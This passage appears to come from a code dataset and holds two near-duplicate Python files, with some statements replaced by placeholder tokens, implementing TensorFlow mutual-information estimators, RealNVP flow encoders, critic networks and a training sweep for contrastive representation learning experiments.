(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = 
copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event 
size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, 
None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n 
training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
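`adap_label_smooth_pcc` in the entry above derives its smoothing strength from `acti_func`, a piecewise-linear schedule over the predicted probability. The plain NumPy restatement below is an illustrative sketch, not part of the dataset row; the parameters a, b, c keep the names used in the source, and the sample inputs are arbitrary.

import numpy as np

def acti_func_np(x, a, b, c):
    # alpha falls linearly from a to 0 on [0, b], stays 0 on (b, c),
    # then rises linearly back to a on [c, 1], matching the embedded acti_func.
    x = np.asarray(x, dtype=float)
    alpha = np.zeros_like(x)
    alpha = np.where(x <= b, -a * x / b + a, alpha)
    alpha = np.where(x >= c, a * x / (1.0 - c) + a * c / (c - 1.0), alpha)
    return alpha

print(acti_func_np([0.0, 0.2, 0.5, 0.9, 1.0], a=0.2, b=0.3, c=0.7))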
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. 
(2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\n<function token>\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = 
copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event 
size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via 